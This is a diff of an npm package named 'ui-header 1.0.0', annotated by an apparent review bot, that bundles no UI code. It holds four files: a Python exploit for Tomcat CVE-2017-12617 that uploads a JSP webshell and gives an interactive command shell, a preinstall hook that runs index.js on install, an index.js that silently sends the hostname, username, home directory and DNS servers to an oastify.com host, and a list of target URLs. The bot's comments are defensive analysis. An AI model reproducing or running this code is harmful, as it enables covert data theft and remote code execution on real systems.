ui-header 1.0.0


Potentially problematic release.



package/42966.py ADDED
@@ -0,0 +1,200 @@
1
+ #!/usr/bin/python
2
+ import requests
3
+ import re
4
+ import signal
5
+ from optparse import OptionParser
6
+
7
+ class bcolors:
8
+ HEADER = '\033[95m'
9
+ OKBLUE = '\033[94m'
10
+ OKGREEN = '\033[92m'
11
+ WARNING = '\033[93m'
12
+ FAIL = '\033[91m'
13
+ ENDC = '\033[0m'
14
+ BOLD = '\033[1m'
15
+ UNDERLINE = '\033[4m'
16
+
17
+
18
+ banner="""
19
+
20
+
21
+ _______ ________ ___ ___ __ ______ __ ___ __ __ ______
22
+ / ____\ \ / / ____| |__ \ / _ \/_ |____ | /_ |__ \ / //_ |____ |
23
+ | | \ \ / /| |__ ______ ) | | | || | / /_____| | ) / /_ | | / /
24
+ | | \ \/ / | __|______/ /| | | || | / /______| | / / '_ \| | / /
25
+ | |____ \ / | |____ / /_| |_| || | / / | |/ /| (_) | | / /
26
+ \_____| \/ |______| |____|\___/ |_|/_/ |_|____\___/|_|/_/
27
+
28
+
29
+
30
+ [@intx0x80]
31
+
32
+ """
33
+
34
+
35
+ def signal_handler(signal, frame):
36
+
37
+ print ("\033[91m"+"\n[-] Exiting"+"\033[0m")
38
+
39
+ exit()
40
+
41
+ signal.signal(signal.SIGINT, signal_handler)
42
+
43
+
44
+
45
+
46
+ def removetags(tags):
47
+ remove = re.compile('<.*?>')
48
+ txt = re.sub(remove, '\n', tags)
49
+ return txt.replace("\n\n\n","\n")
50
+
51
+
52
+ def getContent(url,f):
53
+ headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'}
54
+ re=requests.get(str(url)+"/"+str(f), headers=headers)
55
+ return re.content
56
+
57
+ def createPayload(url,f):
58
+ evil='<% out.println("AAAAAAAAAAAAAAAAAAAAAAAAAAAAA");%>'
59
+ headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'}
60
+ req=requests.put(str(url)+str(f)+"/",data=evil, headers=headers)
61
+ if req.status_code==201:
62
+ print ("File Created ..")
63
+
64
+
65
+ def RCE(url,f):
66
+ EVIL="""<FORM METHOD=GET ACTION='{}'>""".format(f)+"""
67
+ <INPUT name='cmd' type=text>
68
+ <INPUT type=submit value='Run'>
69
+ </FORM>
70
+ <%@ page import="java.io.*" %>
71
+ <%
72
+ String cmd = request.getParameter("cmd");
73
+ String output = "";
74
+ if(cmd != null) {
75
+ String s = null;
76
+ try {
77
+ Process p = Runtime.getRuntime().exec(cmd,null,null);
78
+ BufferedReader sI = new BufferedReader(new
79
+ InputStreamReader(p.getInputStream()));
80
+ while((s = sI.readLine()) != null) { output += s+"</br>"; }
81
+ } catch(IOException e) { e.printStackTrace(); }
82
+ }
83
+ %>
84
+ <pre><%=output %></pre>"""
85
+
86
+
87
+
88
+ headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'}
89
+
90
+ req=requests.put(str(url)+f+"/",data=EVIL, headers=headers)
91
+
92
+
93
+
94
+ def shell(url,f):
95
+
96
+ while True:
97
+ headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'}
98
+ cmd=input("$ ")
99
+ payload={'cmd':cmd}
100
+ if cmd=="q" or cmd=="Q":
101
+ break
102
+
103
+ re=requests.get(str(url)+"/"+str(f),params=payload,headers=headers)
104
+ re=str(re.content)
105
+ t=removetags(re)
106
+ print (t)
107
+
108
+
109
+
110
+
111
+
112
+ #print bcolors.HEADER+ banner+bcolors.ENDC
113
+
114
+ parse=OptionParser(
115
+
116
+
117
+ bcolors.HEADER+"""
118
+
119
+
120
+ _______ ________ ___ ___ __ ______ __ ___ __ __ ______
121
+ / ____\ \ / / ____| |__ \ / _ \/_ |____ | /_ |__ \ / //_ |____ |
122
+ | | \ \ / /| |__ ______ ) | | | || | / /_____| | ) / /_ | | / /
123
+ | | \ \/ / | __|______/ /| | | || | / /______| | / / '_ \| | / /
124
+ | |____ \ / | |____ / /_| |_| || | / / | |/ /| (_) | | / /
125
+ \_____| \/ |______| |____|\___/ |_|/_/ |_|____\___/|_|/_/
126
+
127
+
128
+
129
+
130
+ ./cve-2017-12617.py [options]
131
+
132
+ options:
133
+
134
+ -u ,--url [::] check target url if it's vulnerable
135
+ -p,--pwn [::] generate webshell and upload it
136
+ -l,--list [::] hosts list
137
+
138
+ [+]usage:
139
+
140
+ ./cve-2017-12617.py -u http://127.0.0.1
141
+ ./cve-2017-12617.py --url http://127.0.0.1
142
+ ./cve-2017-12617.py -u http://127.0.0.1 -p pwn
143
+ ./cve-2017-12617.py --url http://127.0.0.1 -pwn pwn
144
+ ./cve-2017-12617.py -l hotsts.txt
145
+ ./cve-2017-12617.py --list hosts.txt
146
+
147
+
148
+ [@intx0x80]
149
+
150
+ """+bcolors.ENDC
151
+
152
+ )
153
+
154
+
155
+ parse.add_option("-u","--url",dest="U",type="string",help="Website Url")
156
+ parse.add_option("-p","--pwn",dest="P",type="string",help="generate webshell and upload it")
157
+ parse.add_option("-l","--list",dest="L",type="string",help="hosts File")
158
+
159
+ (opt,args)=parse.parse_args()
160
+
161
+ if opt.U==None and opt.P==None and opt.L==None:
162
+ print(parse.usage)
163
+ exit(0)
164
+
165
+
166
+
167
+ else:
168
+ if opt.U!=None and opt.P==None and opt.L==None:
169
+ print (bcolors.OKGREEN+banner+bcolors.ENDC)
170
+ url=str(opt.U)
171
+ checker="Poc.jsp"
172
+ print (bcolors.BOLD +"Poc Filename {}".format(checker))
173
+ createPayload(str(url)+"/",checker)
174
+ con=getContent(str(url)+"/",checker)
175
+ if b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAA' in con:
176
+ print (bcolors.WARNING+url+' it\'s Vulnerable to CVE-2017-12617'+bcolors.ENDC)
177
+ print (bcolors.WARNING+url+"/"+checker+bcolors.ENDC)
178
+
179
+ else:
180
+ print ('Not Vulnerable to CVE-2017-12617 ')
181
+ elif opt.P!=None and opt.U!=None and opt.L==None:
182
+ print (bcolors.OKGREEN+banner+bcolors.ENDC)
183
+ pwn=str(opt.P)
184
+ url=str(opt.U)
185
+ print ("Uploading Webshell .....")
186
+ pwn=pwn+".jsp"
187
+ RCE(str(url)+"/",pwn)
188
+ shell(str(url),pwn)
189
+ elif opt.L!=None and opt.P==None and opt.U==None:
190
+ print (bcolors.OKGREEN+banner+bcolors.ENDC)
191
+ w=str(opt.L)
192
+ f=open(w,"r")
193
+ print ("Scaning hosts in {}".format(w))
194
+ checker="Poc.jsp"
195
+ for i in f.readlines():
196
+ i=i.strip("\n")
197
+ createPayload(str(i)+"/",checker)
198
+ con=getContent(str(i)+"/",checker)
199
+ if 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAA' in con:
200
+ print (str(i)+"\033[91m"+" [ Vulnerable ] ""\033[0m")
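Review bot: This file does not belong in a package named ui-header: its own usage text identifies it as a checker and web-shell uploader for CVE-2017-12617, and neither index.js nor package.json references it. `createPayload` and `RCE` send HTTP PUT requests carrying JSP content to a caller-supplied URL, and the `-l` mode loops over a hosts file, which is the shape of the bundled package/scan.txt. Treat the release as hostile and do not execute the script. The defender-side signals visible here are PUT requests to paths ending in `.jsp/` and unexpected files such as `Poc.jsp` appearing in a Tomcat web root; the mitigation for the CVE is to keep the default servlet's `readonly` parameter at true and run a fixed Tomcat release.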
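--- a/package/index.js
+++ b/package/index.js
@@ -0,0 +1,47 @@
+//author:- whitehacker003@protonmail.com
+const os = require("os");
+const dns = require("dns");
+const querystring = require("querystring");
+const https = require("https");
+const packageJSON = require("./package.json");
+const package = packageJSON.name;
+
+const trackingData = JSON.stringify({
+p: package,
+c: __dirname,
+hd: os.homedir(),
+hn: os.hostname(),
+un: os.userInfo().username,
+dns: dns.getServers(),
+r: packageJSON ? packageJSON.___resolved : undefined,
+v: packageJSON.version,
+pjson: packageJSON,
+});
+
+var postData = querystring.stringify({
+msg: trackingData,
+});
+
+var options = {
+hostname: "u83bgevclp91jbnqeqvvklvj4aa1ysmh.oastify.com", //replace burpcollaborator.net with Interactsh or pipedream
+port: 443,
+path: "/",
+method: "POST",
+headers: {
+"Content-Type": "application/x-www-form-urlencoded",
+"Content-Length": postData.length,
+},
+};
+
+var req = https.request(options, (res) => {
+res.on("data", (d) => {
+process.stdout.write(d);
+});
+});
+
+req.on("error", (e) => {
+// console.error(e);
+});
+
+req.write(postData);
+req.end();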
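Review bot: Loading this module discloses host-identifying data to a third party: `trackingData` gathers the install directory, home directory, hostname, username, DNS servers and the full package.json, and `https.request` POSTs it to the hard-coded oastify.com hostname in `options`. The file exports nothing and contains no UI code, so this request is its only effect, and the empty `req.on("error")` handler keeps a failed send silent for whoever installs it. Since package.json runs the file from `preinstall`, any machine that installed ui-header 1.0.0 should be treated as having leaked those fields. Search DNS and proxy logs for that hostname and block it, and install unvetted packages with `npm install --ignore-scripts`.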
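--- a/package/package.json
+++ b/package/package.json
@@ -0,0 +1,12 @@
+{
+"name": "ui-header",
+"version": "1.0.0",
+"description": "",
+"main": "index.js",
+"scripts": {
+"test": "echo \"Error: no test specified\" && exit 1",
+"preinstall":"node index.js"
+},
+"author": "",
+"license": "ISC"
+}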
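Review bot: The `"preinstall":"node index.js"` entry under `scripts` makes npm execute index.js on the installing machine during `npm install`, so the code runs even if nothing ever imports ui-header. The manifest has an empty description and author and declares no dependencies, so it gives no legitimate reason for an install-time hook. Audit lockfiles and internal registries for ui-header 1.0.0, and set `ignore-scripts=true` in the CI `.npmrc` so lifecycle hooks from unvetted packages do not run. The following section, package/package.json&, is a line-for-line copy of this manifest and looks like a stray file from the publisher's working directory.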
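--- a/package/package.json&
+++ b/package/package.json&
@@ -0,0 +1,12 @@
+{
+"name": "ui-header",
+"version": "1.0.0",
+"description": "",
+"main": "index.js",
+"scripts": {
+"test": "echo \"Error: no test specified\" && exit 1",
+"preinstall":"node index.js"
+},
+"author": "",
+"license": "ISC"
+}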
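--- a/package/scan.txt
+++ b/package/scan.txt
@@ -0,0 +1,24 @@
+https://open-preview-ent-api.safescore.ai
+https://open-preview-scoring-api.safescore.ai
+https://preview-ap-1.safescore.ai
+https://preview-caas-azure-ap-south-1.safescore.ai
+https://preview-caas-crowdstrike-ap-south-1.safescore.ai
+https://preview-caas-gcp-scc-ap-south-1.safescore.ai
+https://preview-caas-people-ap-south-1.safescore.ai
+https://preview-caas-qualys-ap-south-1.safescore.ai
+https://preview-caas-saas-ap-south-1.safescore.ai
+https://preview-caas-tanium-ap-south-1.safescore.ai
+https://preview-caas-tenable-ap-south-1.safescore.ai
+https://preview-caas-wiz-ap-south-1.safescore.ai
+https://preview-ent-api.safescore.ai
+https://preview-scoring-api.safescore.ai
+https://preview.safescore.ai
+https://signal-ingestor-preview-ap-south-1.safescore.ai
+https://preview-api.safeme.ai
+https://preview-migration.safeme.ai
+https://preview-scim.safeme.ai
+https://preview.safeme.ai
+https://preview.safe-x.cloud
+https://auth.safescore.io
+https://gpt.safescore.io
+https://mygpt.safescore.io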